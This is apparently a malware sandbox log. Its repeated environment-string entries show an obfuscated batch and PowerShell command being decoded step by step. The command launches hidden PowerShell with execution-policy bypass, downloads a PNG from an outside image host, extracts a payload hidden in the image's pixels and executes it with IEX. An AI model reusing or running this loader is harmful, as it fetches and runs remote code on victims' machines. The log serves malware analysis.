| Get Environment String | name = ;`}~, result_out = set suL]Fl6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al Fl'+']'+' qFl6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'3737-%'+'`pe -As'+'sem3k9l`'+'qFl6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'Fl66pBBk37s'+'aKFl] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11Fl] qFl6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRea3719a'+'7'+'%zEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgFlDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'Fl66pBBk'+'mkaKFl] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\FlX]eac%zEh1'+'Fl6'+'6'+'pBBk7 Zn10..H'+'2('+'))\Fl66pBBk'+'t'+'taKFl66pBBk37s.aEe'+'ttyZ7el1Fl66pBBk7,'+'Fl6'+'6pBBk_'+')[Fl66pBBkmk'+'{Fl66pBBk'+'_*H28+Fl66pBBk7PjyaK1{mat%zEhPjy::zEh'+'lX'+'X]11Fl66'+'pBBktt.B-3k9an37Dn5)*Dn6)-3k9X]'+'1Fl66pBBkt'+'t.aE -3k9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.%e7'+'t.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1Fl66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ Fl6aRIA3k9le:e*Xbt).VaLuE.InFl6PjkEVDaXmBkanD.IqFl6NVPjkesVDaRZty%11Ljh eqFl6NV:s3L]V).Fl6aL3e ) ^^^|tyPj4ERsheZVElL -nXqFl6NZqFl6N%E]aVDa%I -qFl6NXlPj -4ZqFl6N %zEhI3737en -e7ecu%IPjqFl6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqFl6N37 ^^^^^^^&1 @eqFl6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo |
|
1 | |
| Get Environment String | name = +?.,, result_out = set suL]f6aK. 1 @sheZVelLI37{DnPjy+@s%zEhELlI37{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'3737-%'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBk37s'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRea3719a'+'7'+'%zEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eac%zEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBk37s.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{mat%zEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9an37Dn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9an37 Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.%e7'+'t.E'+'ncX37Zn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkEVDaXmBkanD.Iqf6NVPjkesVDaRZty%11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6N%E]aVDa%I -qf6NXlPj -4Zqf6N %zEhI3737en -e7ecu%IPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqf6N37 ^^^^^^^&1 @eqf6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cm37.e7E cgc oa37Z/Yo |
|
1 | |
| Get Environment String | name = '], result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@s%zEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-%'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRead19a'+'7'+'%zEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eac%zEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{mat%zEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.%e7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{s%RInaEPjy{VDa%zEhA]Pjy#H).ReplaVDaE11{VDa%zEhA]Pjy98+{VDa%zEhA]Pjy8#+{VDa%zEhA]PjyDn06),{s%RInaEPjy{VDa%zEhA]PjyDn2H).ReplaVDaE11{VDa%zEhA]PjyDnDn8+{VDa%zEhA]Pjy5H+{VDa%zEhA]Pjy8Dn),{s%RInaEPjy{VDa%zEhA]Pjy#6))^&^& se% aDI/`aKEc%zEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkEVDaXmBkanD.Iqf6NVPjkesVDaRZty%11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6N%E]aVDa%I -qf6NXlPj -4Zqf6N %zEhIdden -e7ecu%IPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@Znpu% ) ^&^& cmd.e7E cgc oadZ/Yo |
|
1 | |
| Get Environment String | name = [$#?, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9VDa'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.Te7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhVDaII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaVDaE1'9a7',{sTRInaEPjy{VDaTzEhA]Pjy#H).ReplaVDaE11{VDaTzEhA]Pjy98+{VDaTzEhA]Pjy8#+{VDaTzEhA]PjyDn06),{sTRInaEPjy{VDaTzEhA]PjyDn2H).ReplaVDaE11{VDaTzEhA]PjyDnDn8+{VDaTzEhA]Pjy5H+{VDaTzEhA]Pjy8Dn),{sTRInaEPjy{VDaTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkEVDaXmBkanD.Iqf6NVPjkesVDaRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6NTE]aVDaTI -qf6NXlPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -VDaPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:VDaXmstyec{H,2H,25Pjy-LQXIn'')1@ZnpuT ) ^&^& cmd.e7E cgc oadZ/Yo |
|
1 | |
| Get Environment String | name = }\, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZo\fX]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.Te7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkECXmBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6NTE]aCTI -qf6NXlPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:CXmstyec{H,2H,25Pjy-LQXIn'')1@ZnpuT ) ^&^& cmd.e7E cgc oadZ/Yo |
|
1 | |
| Get Environment String | name = *.@, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'Xb') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9X'+'7.cX'+'mcg90cgfDncg'+'gat2BkVsK_X.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fX]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lX'+'X]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9X]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EXb1'+'{jh`st'+'em.Te7'+'t.E'+'ncXdZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xbt).VaLuE.Inf6PjkECXmBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -nXqf6NZqf6NTE]aCTI -qf6NXlPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:CXmstyec{H,2H,25Pjy-LQXIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y% |
|
1 | |
| Get Environment String | name = *}, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'ob') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'Eob1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*obt).VaLuE.Inf6PjkEComBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Pjy-LQoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y% |
|
1 | |
| Get Environment String | name = `._, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'X') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xt).VaLuE.Inf6PjkEComBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Pjy-LQoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y% |
|
1 | |
| Get Environment String | name = \#, result_out = set suL]f6aK. 1 @sheZVelLId{DnPjy+@sTzEhELlId{Dn#Pjy+'X') 11's'+'al f'+']'+' qf6N'+'e4-Pj3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'PjpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Pjy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7PjyaK1{matTzEhPjy::zEh'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Pjy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Pjy)'+')').ReplaCE1'9a7',{sTRInaEPjy{CTzEhA]Pjy#H).ReplaCE11{CTzEhA]Pjy98+{CTzEhA]Pjy8#+{CTzEhA]PjyDn06),{sTRInaEPjy{CTzEhA]PjyDn2H).ReplaCE11{CTzEhA]PjyDnDn8+{CTzEhA]Pjy5H+{CTzEhA]Pjy8Dn),{sTRInaEPjy{CTzEhA]Pjy#6))^&^& seT aDI/`aKEcTzEhPj 1gZ f6aRIA3k9le:e*Xt).VaLuE.Inf6PjkEComBkanD.Iqf6NVPjkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyPj4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolPj -4Zqf6N TzEhIdden -e7ecuTIPjqf6NpPjLIc 3k9`tyAjhjh -nPjty]PjzEhIle -CPjmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Pjy-JoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y% |
|
1 | |
| Get Environment String | name = ~\, result_out = set suL]f6aK. 1 @sheZVelLId{DnOy+@sTzEhELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'OpenRead19a'+'7'+'TzEhttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTzEh1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7OyaK1{matTzEhOy::zEh'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTzEhA]Oy#H).ReplaCE11{CTzEhA]Oy98+{CTzEhA]Oy8#+{CTzEhA]OyDn06),{sTRInaEOy{CTzEhA]OyDn2H).ReplaCE11{CTzEhA]OyDnDn8+{CTzEhA]Oy5H+{CTzEhA]Oy8Dn),{sTRInaEOy{CTzEhA]Oy#6))^&^& seT aDI/`aKEcTzEhO 1gZ f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolO -4Zqf6N TzEhIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OzEhIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y% |
|
1 | |
| Get Environment String | name = \,, result_out = set suL]f6aK. 1 @sheZVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heZec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'Zng9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4Zn'+'g.B'+'Ztmap11f] qf6Net.W'+'e3k9C'+'lZent).'+'OpenRead19a'+'7'+'TFttps:cgcgZmag'+'es2.Zmg3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'heZ%\fo]eacTF1'+'f6'+'6'+'pBBk7 Zn10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyZ7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodZn'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]Zng1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDI/`aKEcTFO 1gZ f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRZtyT11Ljh eqf6NV:s3L]V).f6aL3e ) ^^^|tyO4ERsheZVElL -noqf6NZqf6NTE]aCTI -qf6NolO -4Zqf6N TFIdden -e7ecuTIOqf6NpOLIc 3k9`tyAjhjh -nOty]OFIle -COmBkAqf6Nd ^^^^^^^&1 @eqf6NV:Comstyec{H,2H,25Oy-JoIn'')1@ZnpuT ) ^&^& cmd.e7E cgc %adZ/Y% |
|
1 | |
| Get Environment String | name = `[+, result_out = set suL]f6aK. 1 @sheiVelLId{DnOy+@sTFELlId{Dn#Oy+'X') 11's'+'al f'+']'+' qf6N'+'e4-O3k9heiec'+'t'+'['+'A'+'dd-T'+'`pe -As'+'sem3k9l`'+'qf6Name 9a7jh`stem.D]a'+'4'+'ing9a7['+'f66pBBkds'+'aKf] jh`ste'+'m.'+'D]a4in'+'g.B'+'itmap11f] qf6Net.W'+'e3k9C'+'lient).'+'OpenRead19a'+'7'+'TFttps:cgcgimag'+'es2.img3k9o'+'7.co'+'mcg90cgfDncg'+'gat2BkVsK_o.'+'png9a7'+'))['+'f66pBBk'+'mkaKf] B`'+'t'+'e{Oy '+'2DnH0[10.'+'.H)3k9'+'jh'+'hei%\fo]eacTF1'+'f6'+'6'+'pBBk7 in10..H'+'2('+'))\f66pBBk'+'t'+'taKf66pBBkds.aEe'+'ttyi7el1f66pBBk7,'+'f6'+'6pBBk_'+')[f66pBBkmk'+'{f66pBBk'+'_*H28+f66pBBk7OyaK1{matTFOy::F'+'lo'+'o]11f66'+'pBBktt.B-3k9andDn5)*Dn6)-3k9o]'+'1f66pBBkt'+'t.aE -3k9and Dn5))}'+'}['+'I'+'EX1'+'{jh`st'+'em.Te7'+'t.E'+'ncodin'+'g'+'Oy::AjhCII.'+'aEetjh'+'t]ing1f66'+'pBBk'+'mk{0.'+'.'+'Dn'+'90('+'Oy)'+')').ReplaCE1'9a7',{sTRInaEOy{CTFA]Oy#H).ReplaCE11{CTFA]Oy98+{CTFA]Oy8#+{CTFA]OyDn06),{sTRInaEOy{CTFA]OyDn2H).ReplaCE11{CTFA]OyDnDn8+{CTFA]Oy5H+{CTFA]Oy8Dn),{sTRInaEOy{CTFA]Oy#6))^&^& seT aDI/`aKEcTFO 1gi f6aRIA3k9le:e*Xt).VaLuE.Inf6OkEComBkanD.Iqf6NVOkesCRityT11Ljh 